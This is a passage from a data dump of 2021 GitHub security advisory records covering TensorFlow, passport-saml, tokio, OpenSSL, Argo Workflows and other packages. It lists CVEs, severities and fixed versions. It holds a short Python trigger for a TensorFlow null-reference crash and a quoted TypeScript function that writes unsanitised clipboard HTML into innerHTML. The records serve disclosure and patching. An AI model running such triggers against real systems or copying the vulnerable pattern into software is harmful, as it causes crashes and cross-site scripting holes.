'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-q7f7-544h-67h9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37684'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:13:21Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-5379-r78w-42h2,2021-08-27T23:25:28Z,2021-08-30T16:11:57Z,,['CVE-2021-39171'],Unlimited transforms allowed for signed nodes,"### Impact +A malicious SAML payload can require transforms that consume significant system resources to process, thereby resulting in reduced or denied service. This would be an effective way to perform a denial-of-service attack. + +### Patches +This has been resolved in version 3.1.0. The resolution is to limit the number of allowable transforms to 2. + +### References +https://github.com/node-saml/passport-saml/pull/595 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'passport-saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/node-saml/passport-saml/security/advisories/GHSA-5379-r78w-42h2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39171'}, {'type': 'WEB', 'url': 'https://github.com/node-saml/passport-saml/pull/595'}, {'type': 'PACKAGE', 'url': 'https://github.com/node-saml/passport-saml'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T23:25:28Z', 'nvd_published_at': '2021-08-27T22:15:00Z'}" +1.4.0,GHSA-5m69-3chg-6f8m,2021-08-26T19:21:15Z,2021-08-30T16:23:26Z,,['CVE-2020-18702'],Cross Site Scripting (XSS) in Quokka,Cross Site Scripting (XSS) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the 'Username' parameter in the component 'quokka/admin/actions.py'.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'quokka'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-18702'}, {'type': 'WEB', 'url': 'https://github.com/rochacbruno/quokka/issues/675'}, {'type': 'PACKAGE', 'url': 'https://github.com/rochacbruno/quokka'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T19:21:15Z', 'nvd_published_at': '2021-08-16T18:15:00Z'}" +1.4.0,GHSA-5hp8-35wj-m525,2021-08-19T21:23:38Z,2021-08-25T20:44:03Z,,['CVE-2019-15542'],Uncontrolled recursion in ammonia,An issue was discovered in the ammonia crate before 2.1.0 for Rust. There is uncontrolled recursion during HTML DOM tree serialization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ammonia'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15542'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-ammonia/ammonia'}, {'type': 'WEB', 'url': 'https://github.com/rust-ammonia/ammonia/blob/master/CHANGELOG.md#210'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0001.html'}]","{'cwe_ids': ['CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:23:38Z', 'nvd_published_at': None}" +1.4.0,GHSA-49fq-pw77-6qxj,2023-06-13T21:55:41Z,2021-08-25T20:44:15Z,,['CVE-2019-16882'],Use after free in string-interner,"Affected versions of this crate did not clone contained strings when an interner is cloned. Interners have raw pointers to the contained strings, and they keep pointing the strings which the old interner owns, after the interner is cloned. If a new cloned interner is alive and the old original interner is dead, the new interner has dangling pointers to the old interner's storage, which is already dropped. + +This allows an attacker to read the already freed memory. The dangling pointers are used by the interners to check a string is already interned. An attacker can do brute force attack to get the data pointed by the dangling pointer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'string-interner'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.7.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'string-interner'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16882'}, {'type': 'WEB', 'url': 'https://github.com/Robbepop/string-interner/issues/9'}, {'type': 'WEB', 'url': 'https://github.com/Robbepop/string-interner/pull/10'}, {'type': 'WEB', 'url': 'https://github.com/Robbepop/string-interner/commit/d91dac0cfe42512526879cdfaac0b81beff54089'}, {'type': 'PACKAGE', 'url': 'https://github.com/Robbepop/string-interner'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0023.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:23:01Z', 'nvd_published_at': None}" +1.4.0,GHSA-9p29-94hp-8rvc,2023-01-24T15:08:52Z,2021-08-02T17:22:07Z,,['CVE-2021-28833'],qiita-markdown Cross-site Scripting vulnerability,"Increments Qiita::Markdown before 0.34.0 allows XSS via a crafted gist link, a different vulnerability than CVE-2021-28796.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'qiita-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.34.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28833'}, {'type': 'WEB', 'url': 'https://github.com/increments/qiita-markdown/commit/b5d4e60bf537ceb177e70bf91653d29575e1aa21'}, {'type': 'PACKAGE', 'url': 'https://github.com/increments/qiita-markdown'}, {'type': 'WEB', 'url': 'https://github.com/increments/qiita-markdown/compare/v0.33.0...v0.34.0'}, {'type': 'WEB', 'url': 'https://github.com/increments/qiita-markdown/releases'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/50'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-22T15:42:57Z', 'nvd_published_at': '2021-06-21T13:15:00Z'}" +1.4.0,GHSA-w74j-v8xh-3w5h,2021-08-24T14:18:05Z,2021-08-25T14:42:09Z,,['CVE-2021-37667'],Reference binding to nullptr in unicode encoding,"### Impact +An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`: + +```python +import tensorflow as tf +from tensorflow.python.ops import gen_string_ops + +gen_string_ops.unicode_encode( + input_values=[], + input_splits=[], + output_encoding='UTF-8', + errors='ignore', + replacement_char='a') +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty: + +```cc + const Tensor& input_splits = context->input(1); + const auto input_splits_flat = input_splits.flat(); + TensorShape output_shape({input_splits.dim_size(0) - 1}); +``` + +### Patches +We have patched the issue in GitHub commit [2e0ee46f1a47675152d3d865797a18358881d7a6](https://github.com/tensorflow/tensorflow/commit/2e0ee46f1a47675152d3d865797a18358881d7a6). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37667'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/2e0ee46f1a47675152d3d865797a18358881d7a6'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T14:18:05Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-f3fg-5j9p-vchc,2023-04-03T19:22:33Z,2021-08-25T21:01:41Z,,['CVE-2021-31153'],File exposure in pleaser,"pleaser before 0.4.0 allows a local unprivileged attacker to gain knowledge about the existence of files or directories in privileged locations via the search_path function, the --check option, or the -d option.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'pleaser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31153'}, {'type': 'WEB', 'url': 'https://crates.io/crates/pleaser'}, {'type': 'WEB', 'url': 'https://gitlab.com/edneville/please/-/tree/master/src/bin'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0104.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/18/1'}]","{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T19:35:31Z', 'nvd_published_at': '2021-05-27T13:15:00Z'}" +1.4.0,GHSA-87cj-px37-rc3x,2021-08-26T15:58:50Z,2021-08-30T16:25:35Z,,['CVE-2021-23422'],OS Command Injection in bikeshed,"This affects the package bikeshed before 3.0.0. This can occur when an untrusted source file containing Inline Tag Command metadata is processed. When an arbitrary OS command is executed, the command output would be included in the HTML output.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'bikeshed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23422'}, {'type': 'WEB', 'url': 'https://github.com/tabatkins/bikeshed/commit/b2f668fca204260b1cad28d5078e93471cb6b2dd'}, {'type': 'PACKAGE', 'url': 'https://github.com/tabatkins/bikeshed'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-BIKESHED-1537646'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:58:50Z', 'nvd_published_at': '2021-08-16T08:15:00Z'}" +1.4.0,GHSA-2grh-hm3w-w7hv,2023-06-13T22:08:56Z,2021-08-25T20:55:51Z,,['CVE-2021-38191'],Race condition in tokio,"When aborting a task with JoinHandle::abort, the future is dropped in the thread calling abort if the task is not currently being executed. This is incorrect for tasks spawned on a LocalSet. This can easily result in race conditions as many projects use Rc or RefCell in their Tokio tasks for better performance.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tokio'}, 'ecosystem_specific': {'affected_functions': ['tokio::task::JoinHandle::abort']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.8.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'tokio'}, 'ecosystem_specific': {'affected_functions': ['tokio::task::JoinHandle::abort']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'tokio'}, 'ecosystem_specific': {'affected_functions': ['tokio::task::JoinHandle::abort']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.3'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'tokio'}, 'ecosystem_specific': {'affected_functions': ['tokio::task::JoinHandle::abort']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '1.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38191'}, {'type': 'WEB', 'url': 'https://github.com/tokio-rs/tokio/issues/3929'}, {'type': 'PACKAGE', 'url': 'https://github.com/tokio-rs/tokio'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/tokio/RUSTSEC-2021-0072.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0072.html'}]","{'cwe_ids': ['CWE-362', 'CWE-366'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:30:23Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-gpfj-4j6g-c4w9,2021-08-30T23:16:08Z,2021-08-12T20:42:17Z,,['CVE-2021-37700'],Clipboard-based DOM-XSS,"### Impact + +A self Cross-Site Scripting vulnerability exists in the @github/paste-markdown library. If the clipboard data contains the string ``, a **div** is dynamically created, and the clipboard content is copied into its **innerHTML** property without any sanitization, resulting in improper execution of JavaScript in the browser of the victim (the user who pasted the code). Users directed to copy text from a malicious website and paste it into pages that utilize this library are affected. + +The following @github/paste-markdown code snippet is triggered when the user pastes something and the browser's clipboard data contains an entry whose content-type is **text/HTML**. + +```typescript +function generateText(transfer: DataTransfer): string | undefined { + if (Array.from(transfer.types).indexOf('text/html') === -1) return + + let html = transfer.getData('text/html') + if (!/
/, '') + + const el = document.createElement('div') + el.innerHTML = html + const tables = el.querySelectorAll('table') + + for (const table of tables) { + if (table.closest('[data-paste-markdown-skip]')) { + table.replaceWith(new Text(table.textContent || '')) + } + const formattedTable = tableMarkdown(table) + table.replaceWith(new Text(formattedTable)) + } + + return el.innerHTML +} +``` + +### Patches +A security patch was released in [version 0.3.4](https://github.com/github/paste-markdown/releases/tag/v0.3.4). + +### Workarounds +A Content Security Policy that prevents `unsafe-inline` helps reduce the likelihood of this vulnerability being exploited in modern browsers. + + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@github/paste-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/github/paste-markdown/security/advisories/GHSA-gpfj-4j6g-c4w9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37700'}, {'type': 'WEB', 'url': 'https://github.com/github/paste-markdown/commit/32b7ea3f29ae8f256f9d19768387be42678ddf30'}, {'type': 'PACKAGE', 'url': 'https://github.com/github/paste-markdown'}, {'type': 'WEB', 'url': 'https://github.com/github/paste-markdown/releases/tag/v0.3.4'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@github/paste-markdown'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-12T20:41:45Z', 'nvd_published_at': '2021-08-12T21:15:00Z'}" +1.4.0,GHSA-9f8f-574q-8jmf,2021-08-26T19:40:47Z,2021-08-30T16:14:00Z,,['CVE-2021-37707'],Manipulation of product reviews via API,"### Impact +Manipulation of product reviews via API + +### Patches +We recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds +For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-9f8f-574q-8jmf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37707'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/912b96de3b839c6c5525c98cbb58f537c2d838be'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T19:40:47Z', 'nvd_published_at': '2021-08-16T19:15:00Z'}" +1.4.0,GHSA-v3j6-xf77-8r9c,2021-08-19T20:51:41Z,2021-08-25T20:49:39Z,,['CVE-2020-35901'],Use-after-free in actix-http,An issue was discovered in the actix-http crate before 2.0.0-alpha.1 for Rust. There is a use-after-free in BodyStream.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'actix-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35901'}, {'type': 'WEB', 'url': 'https://github.com/actix/actix-web/issues/1321'}, {'type': 'PACKAGE', 'url': 'https://github.com/actix/actix-web'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0048.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:51:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-rc7p-gmvh-xfx2,2021-08-02T17:18:32Z,2021-08-02T17:19:52Z,,[],Attack on Kubernetes via Misconfigured Argo Workflows,"### Impact + +Users running using the Argo Server with `--auth-mode=server` (which is the default < v3.0.0) AND have exposed their UI to the Internet may allow remote users to execute arbitrary code on their cluster, e.g. crypto-mining. + +### Resolution + +* Do not expose your user interface to the Internet. +* Change configuration. `--auth-mode=client`. + +For users using an older 2.x version of Argo Server, consider upgrading to Argo Server version 3.x or later. +",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-workflows'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 3.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-workflows/security/advisories/GHSA-rc7p-gmvh-xfx2'}, {'type': 'WEB', 'url': 'https://www.intezer.com/blog/container-security/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-22T20:25:42Z', 'nvd_published_at': None}" +1.4.0,GHSA-83mx-573x-5rw9,2023-09-05T14:49:32Z,2021-08-25T20:54:02Z,,['CVE-2021-3449'],openssl-src NULL pointer Dereference in signature_algorithms processing,"An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '111.15.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3449'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/openssl-src-rs'}, {'type': 'WEB', 'url': 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845'}, {'type': 'WEB', 'url': 'https://kc.mcafee.com/corporate/index?page=content&id=SB10356'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/'}, {'type': 'WEB', 'url': 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0055'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0055.html'}, {'type': 'WEB', 'url': 'https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202103-03'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210326-0006/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0002/'}, {'type': 'WEB', 'url': 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4875'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20210325.txt'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-05'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-06'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-09'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-10'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/27/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/27/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/28/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/28/4'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:21:40Z', 'nvd_published_at': '2021-03-25T15:15:00Z'}" +1.4.0,GHSA-fhvj-7f9p-w788,2023-06-13T16:51:18Z,2021-08-25T20:48:54Z,,['CVE-2020-35887'],"Multiple security issues including data race, buffer overflow, and uninitialized memory drop in arr","arr crate contains multiple security issues. Specifically, + +1. It incorrectly implements Sync/Send bounds, which allows to smuggle non-Sync/Send types across the thread boundary. +2. Index and IndexMut implementation does not check the array bound. +3. Array::new_from_template() drops uninitialized memory. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'arr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35887'}, {'type': 'WEB', 'url': 'https://github.com/sjep/array/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/sjep/array'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0034.html'}]","{'cwe_ids': ['CWE-120'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:56:25Z', 'nvd_published_at': None}" +1.4.0,GHSA-5v34-g2px-j4fw,2022-02-08T21:08:25Z,2021-08-02T16:56:31Z,,['CVE-2021-36374'],Improper Handling of Length Parameter Inconsistency in Apache Ant,"When reading a specially crafted ZIP archive, or a derived formats, an Apache Ant build can be made to allocate large amounts of memory that leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Commonly used derived formats from ZIP archives are for instance JAR files and many office files. Apache Ant prior to 1.9.16 and 1.10.11 were affected.","[{'type': 'CVSS_V3', 'score': 